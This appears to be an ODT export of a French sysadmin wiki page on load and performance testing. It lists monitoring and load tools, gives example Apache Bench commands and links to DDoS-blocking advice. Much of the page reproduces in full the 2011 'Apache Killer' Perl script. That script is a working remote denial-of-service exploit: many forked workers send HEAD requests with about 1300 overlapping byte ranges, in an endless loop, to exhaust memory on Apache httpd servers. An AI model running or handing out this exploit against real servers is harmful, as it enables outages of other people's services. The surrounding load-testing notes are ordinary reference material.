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erf_test_de_charge"/><text:bookmark-start text:name="__RefHeading___perf_test_de_charge_1"/><text:bookmark-start text:name="perf_test_de_charge"/>Perf test de charge<text:bookmark-end text:name="__RefHeading___perf_test_de_charge_1"/><text:bookmark-end text:name="perf_test_de_charge"/></text:h>
      <text:p text:style-name="Text_20_body">Liens :</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="http://www.thegeekstuff.com/2015/02/jmeter-load-testing/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.thegeekstuff.com/2015/02/jmeter-load-testing/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> HPC <text:a xlink:type="simple" xlink:href="https://gitlab.cern.ch/hep-benchmarks/hep-score" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://gitlab.cern.ch/hep-benchmarks/hep-score</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Outils analyse :</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> atop</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> sar / sysstat</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> tload</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> munin</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Outils charge :</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> jmeters</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> ab (apache)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> artillery.io</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> gatling</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> script perl Apache Killer (Remote DOS Perl Script)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> hey</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Autre :</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="LastListParagraph_List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="https://fr.wikipedia.org/wiki/PhantomJS" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">PhantomJS</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___jmeter_2"/><text:bookmark-start text:name="jmeter"/>Jmeter<text:bookmark-end text:name="__RefHeading___jmeter_2"/><text:bookmark-end text:name="jmeter"/></text:h>
      <text:p text:style-name="Text_20_body">Voir aussi :</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="LastListParagraph_List_20_1_Content_First"> Gatling</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Voir</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="http://blog.milamberspace.net/index.php/jmeter-pages/jmeter-test-de-charges-dun-site-web-mode-demploi/jmeteriser-son-scenario-fonctionnel" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://blog.milamberspace.net/index.php/jmeter-pages/jmeter-test-de-charges-dun-site-web-mode-demploi/jmeteriser-son-scenario-fonctionnel</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://blog.milamberspace.net/index.php/jmeter-pages/jmeter-test-de-charges-dun-site-web-mode-demploi/affinage-du-scenario-de-tests" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://blog.milamberspace.net/index.php/jmeter-pages/jmeter-test-de-charges-dun-site-web-mode-demploi/affinage-du-scenario-de-tests</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> <text:a xlink:type="simple" xlink:href="https://blazemeter.com/blog/5-ways-launch-jmeter-test-without-using-jmeter-gui" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blazemeter.com/blog/5-ways-launch-jmeter-test-without-using-jmeter-gui</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___ab_3"/><text:bookmark-start text:name="ab"/>AB<text:bookmark-end text:name="__RefHeading___ab_3"/><text:bookmark-end text:name="ab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www.joedog.org/siege-home/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">siege</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> httperf</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> <text:a xlink:type="simple" xlink:href="https://github.com/bos/pronk%7Cpronk" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">pronk</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Bloquer les attaques DOS</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="LastListParagraph_List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="https://www.abyssproject.net/2014/06/bloquer-les-attaques-ddos-nginx/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.abyssproject.net/2014/06/bloquer-les-attaques-ddos-nginx/</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench</text:a></text:p>
      <text:p text:style-name="Text_20_body">Exempl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b <text:span text:style-name="highlight_re5">-n</text:span> <text:span text:style-name="highlight_nu0">1000</text:span> <text:span text:style-name="highlight_re5">-c</text:span> <text:span text:style-name="highlight_nu0">5</text:span> http:<text:span text:style-name="highlight_sy0">//</text:span>acme.fr<text:span text:style-name="highlight_sy0">/</text:span><text:line-break/>ab <text:span text:style-name="highlight_re5">-r</text:span> <text:span text:style-name="highlight_re5">-n</text:span> <text:span text:style-name="highlight_nu0">100</text:span> <text:span text:style-name="highlight_re5">-c</text:span> <text:span text:style-name="highlight_nu0">10</text:span> <text:span text:style-name="highlight_re5">-k</text:span> <text:span text:style-name="highlight_re5">-H</text:span> <text:span text:style-name="highlight_st0">"Accept-Encoding: gzip, deflate"</text:span> http:<text:span text:style-name="highlight_sy0">//</text:span>acme.fr<text:span text:style-name="highlight_sy0">/</text:span><text:line-break/>ab <text:span text:style-name="highlight_re5">-n</text:span> <text:span text:style-name="highlight_nu0">500</text:span> <text:span text:style-name="highlight_re5">-c</text:span> <text:span text:style-name="highlight_nu0">100</text:span> <text:span text:style-name="highlight_re5">-g</text:span> out.data http:<text:span text:style-name="highlight_sy0">//</text:span>acme.fr<text:span text:style-name="highlight_sy0">/</text:span><text:line-break/>ab <text:span text:style-name="highlight_re5">-n</text:span> <text:span text:style-name="highlight_nu0">10</text:span> <text:span text:style-name="highlight_re5">-c</text:span> <text:span text:style-name="highlight_nu0">5</text:span> <text:span text:style-name="highlight_re5">-A</text:span> utilisateur:P<text:span text:style-name="highlight_sy0">@</text:span>ssw0rd http:<text:span text:style-name="highlight_sy0">//</text:span>acme.fr<text:span text:style-name="highlight_sy0">/</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">-n</text:span> : nombre de requêtes\ <text:span text:style-name="Strong_20_Emphasis">-c</text:span> : concurence, nombre de requête simultanées\ <text:span text:style-name="Strong_20_Emphasis">-k</text:span> : HTTP <text:span text:style-name="Strong_20_Emphasis">KeepAlive</text:span>\ <text:span text:style-name="Strong_20_Emphasis">-e apache.csv</text:span> : Export les données dans un fihcier CSV\ <text:span text:style-name="Strong_20_Emphasis">-r</text:span> : Ne pas se terminer si erreur sur le socket\ <text:span text:style-name="Strong_20_Emphasis">-f</text:span> : Spécificer le protocol SSL/TLS\ <text:span text:style-name="Strong_20_Emphasis">-A</text:span> : Authentification\ <text:span text:style-name="Strong_20_Emphasis">-C</text:span> : cookie-name=value</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___script_perl_apache_killer_remote_dos_perl_script_4"/><text:bookmark-start text:name="script_perl_apache_killer_remote_dos_perl_script"/>Script Perl Apache Killer (Remote DOS Perl Script)<text:bookmark-end text:name="__RefHeading___script_perl_apache_killer_remote_dos_perl_script_4"/><text:bookmark-end text:name="script_perl_apache_killer_remote_dos_perl_script"/></text:h>
      <text:p text:style-name="Text_20_body">Source : <text:a xlink:type="simple" xlink:href="http://seclists.org/fulldisclosure/2011/Aug/175" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://seclists.org/fulldisclosure/2011/Aug/175</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">killapache_pl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Apache httpd Remote Denial of Service (memory exhaustion)</text:span><text:line-break/><text:span text:style-name="highlight_co1">#By Kingcope</text:span><text:line-break/><text:span text:style-name="highlight_co1">#Year 2011</text:span><text:line-break/><text:span text:style-name="highlight_co1">#</text:span><text:line-break/><text:span text:style-name="highlight_co1"># Will result in swapping memory to filesystem on the remote side</text:span><text:line-break/><text:span text:style-name="highlight_co1"># plus killing of processes when running out of swap space.</text:span><text:line-break/><text:span text:style-name="highlight_co1"># Remote System becomes unstable.</text:span><text:line-break/><text:span text:style-name="highlight_co1">#</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw2">use</text:span> IO<text:span text:style-name="highlight_sy0">::</text:span><text:span text:style-name="highlight_me2">Socket</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_kw2">use</text:span> Parallel<text:span text:style-name="highlight_sy0">::</text:span><text:span text:style-name="highlight_me2">ForkManager</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw2">sub</text:span> usage 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Apache Remote Denial of Service (memory exhaustion)<text:span text:style-name="highlight_es0">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">;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by Kingcope<text:span text:style-name="highlight_es0">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">;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usage: perl killapache.pl &lt;host&gt; [numforks]<text:span text:style-name="highlight_es0">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">;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example: perl killapache.pl www.example.com 50<text:span text:style-name="highlight_es0">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw2">sub</text:span> killapache <text:span text:style-name="highlight_br0">{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ATTACKING $ARGV[0] [using $numforks forks]<text:span text:style-name="highlight_es0">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_re0">$pm</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_kw2">new</text:span> Parallel<text:span text:style-name="highlight_sy0">::</text:span><text:span text:style-name="highlight_me2">ForkManager</text:span><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_re0">$numforks</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_co5">$|</text:span><text:span text:style-name="highlight_sy0">=</text:span><text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:a xlink:type="simple" xlink:href="http://perldoc.perl.org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re0">$p</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_st0">""</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_kw1">for</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_re0">$k</text:span><text:span text:style-name="highlight_sy0">=</text:span><text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:span text:style-name="highlight_re0">$k</text:span><text:span text:style-name="highlight_sy0">&lt;</text:span><text:span text:style-name="highlight_nu0">1300</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:span text:style-name="highlight_re0">$k</text:span><text:span text:style-name="highlight_sy0">++</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_re0">$p</text:span> <text:span text:style-name="highlight_sy0">.=</text:span> <text:span text:style-name="highlight_st0">",5-$k"</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw1">for</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_re0">$k</text:span><text:span text:style-name="highlight_sy0">=</text:span><text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:span text:style-name="highlight_re0">$k</text:span><text:span text:style-name="highlight_sy0">&lt;</text:span><text:span text:style-name="highlight_re0">$numforks</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:span text:style-name="highlight_re0">$k</text:span><text:span text:style-name="highlight_sy0">++</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:span text:style-name="highlight_kw1">my</text:span> <text:span text:style-name="highlight_re0">$pid</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_re0">$pm</text:span><text:span text:style-name="highlight_sy0">-&gt;</text:span><text:span text:style-name="highlight_me1">start</text:span> <text:span text:style-name="highlight_kw1">and</text:span> <text:span text:style-name="highlight_kw1">next</text:span><text:span text:style-name="highlight_sy0">;</text:span> <text:tab/><text:line-break/> <text:line-break/><text:span text:style-name="highlight_re0">$x</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_st0">""</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_kw1">my</text:span> <text:span text:style-name="highlight_re0">$sock</text:span> <text:span text:style-name="highlight_sy0">=</text:span> IO<text:span text:style-name="highlight_sy0">::</text:span><text:span text:style-name="highlight_me2">Socket</text:span><text:span text:style-name="highlight_sy0">::</text:span><text:span text:style-name="highlight_me2">INET</text:span><text:span text:style-name="highlight_sy0">-&gt;</text:span><text:span text:style-name="highlight_kw2">new</text:span><text:span text:style-name="highlight_br0">(</text:span>PeerAddr <text:span text:style-name="highlight_sy0">=&gt;</text:span> <text:span text:style-name="highlight_re0">$ARGV</text:span><text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy0">,</text:span><text:line-break/><text:s text:c="33"/>PeerPort <text:span text:style-name="highlight_sy0">=&gt;</text:span> <text:span text:style-name="highlight_st0">"80"</text:span><text:span text:style-name="highlight_sy0">,</text:span><text:line-break/><text:s text:c="21"/><text:tab/><text:tab/><text:tab/> Proto<text:s text:c="4"/><text:span text:style-name="highlight_sy0">=&gt;</text:span> <text:span text:style-name="highlight_st_h">'tcp'</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_re0">$p</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_st0">"HEAD / HTTP/1.1<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>Host: $ARGV[0]<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>Range:bytes=0-$p<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>Accept-Encoding: gzip<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>Connection: close<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span><text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>"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sock</text:span> <text:span text:style-name="highlight_re0">$p</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw1">while</text:span><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_sy0">&lt;</text:span><text:span text:style-name="highlight_re0">$sock</text:span><text:span text:style-name="highlight_sy0">&gt;</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/> <text:span text:style-name="highlight_re0">$pm</text:span><text:span text:style-name="highlight_sy0">-&gt;</text:span><text:span text:style-name="highlight_me1">finish</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/><text:span text:style-name="highlight_re0">$pm</text:span><text:span text:style-name="highlight_sy0">-&gt;</text:span><text:span text:style-name="highlight_me1">wait_all_children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:pPpPpppPpPPppPpppPp<text:span text:style-name="highlight_es0">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw2">sub</text:span> testapache <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:span text:style-name="highlight_kw1">my</text:span> <text:span text:style-name="highlight_re0">$sock</text:span> <text:span text:style-name="highlight_sy0">=</text:span> IO<text:span text:style-name="highlight_sy0">::</text:span><text:span text:style-name="highlight_me2">Socket</text:span><text:span text:style-name="highlight_sy0">::</text:span><text:span text:style-name="highlight_me2">INET</text:span><text:span text:style-name="highlight_sy0">-&gt;</text:span><text:span text:style-name="highlight_kw2">new</text:span><text:span text:style-name="highlight_br0">(</text:span>PeerAddr <text:span text:style-name="highlight_sy0">=&gt;</text:span> <text:span text:style-name="highlight_re0">$ARGV</text:span><text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy0">,</text:span><text:line-break/><text:s text:c="33"/>PeerPort <text:span text:style-name="highlight_sy0">=&gt;</text:span> <text:span text:style-name="highlight_st0">"80"</text:span><text:span text:style-name="highlight_sy0">,</text:span><text:line-break/><text:s text:c="21"/><text:tab/><text:tab/><text:tab/> Proto<text:s text:c="4"/><text:span text:style-name="highlight_sy0">=&gt;</text:span> <text:span text:style-name="highlight_st_h">'tcp'</text:span><text:span text:style-name="highlight_br0">)</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_re0">$p</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_st0">"HEAD / HTTP/1.1<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>Host: $ARGV[0]<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>Range:bytes=0-$p<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>Accept-Encoding: gzip<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>Connection: close<text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span><text:span text:style-name="highlight_es0">\r</text:span><text:span text:style-name="highlight_es0">\n</text:span>"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sock</text:span> <text:span text:style-name="highlight_re0">$p</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_re0">$x</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_sy0">&lt;</text:span><text:span text:style-name="highlight_re0">$sock</text:span><text:span text:style-name="highlight_sy0">&gt;;</text:span><text:line-break/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_re0">$x</text:span> <text:span text:style-name="highlight_sy0">=~</text:span> <text:span text:style-name="highlight_co2">/Partial/</text:span><text:span text:style-name="highlight_br0">)</text:span> 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host seems vuln<text:span text:style-name="highlight_es0">\n</text:span>"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tab/><text:line-break/><text:span text:style-name="highlight_br0">}</text:span> <text:span text:style-name="highlight_kw1">else</text:span> <text:span text:style-name="highlight_br0">{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tab/><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_re0">$#ARGV</text:span> <text:span text:style-name="highlight_sy0">&lt;</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:tab/>usage<text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:a xlink:type="simple" xlink:href="http://perldoc.perl.org/functions/exit.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">exit</text:span></text:a><text:span text:style-name="highlight_sy0">;</text:span><text:tab/><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_kw1">if</text:span> <text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_re0">$#ARGV</text:span> <text:span text:style-name="highlight_sy0">&gt;</text:span> <text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/><text:tab/><text:span text:style-name="highlight_re0">$numforks</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_re0">$ARGV</text:span><text:span text:style-name="highlight_br0">[</text:span><text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_br0">]</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:span text:style-name="highlight_br0">}</text:span> <text:span text:style-name="highlight_kw1">else</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:span text:style-name="highlight_re0">$numforks</text:span> <text:span text:style-name="highlight_sy0">=</text:span> <text:span text:style-name="highlight_nu0">50</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:span text:style-name="highlight_br0">}</text:span><text:line-break/> <text:line-break/><text:span text:style-name="highlight_re0">$v</text:span> <text:span text:style-name="highlight_sy0">=</text:span> testapache<text:span text:style-name="highlight_br0">(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re0">$v</text:span> <text:span text:style-name="highlight_sy0">==</text:span> <text:span text:style-name="highlight_nu0">0</text:span><text:span text:style-name="highlight_br0">)</text:span> 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Host does not seem vulnerable<text:span text:style-name="highlight_es0">\n</text:span>"</text:span><text:span text:style-name="highlight_sy0">;</text:span><text:line-break/><text:tab/><text:a xlink:type="simple" xlink:href="http://perldoc.perl.org/functions/exit.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="highlight_kw3">exit</text:span></text:a><text:span text:style-name="highlight_sy0">;</text:span><text:tab/><text:line-break/><text:span text:style-name="highlight_br0">}</text:span><text:line-break/><text:span text:style-name="highlight_kw1">while</text:span><text:span text:style-name="highlight_br0">(</text:span><text:span text:style-name="highlight_nu0">1</text:span><text:span text:style-name="highlight_br0">)</text:span> <text:span text:style-name="highlight_br0">{</text:span><text:line-break/>killapache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2::53:43</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2026-07-21T22::53:43</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>tech:perf_test_de_charge</dc:title>
  </office:meta>
</office:document-meta>
</file>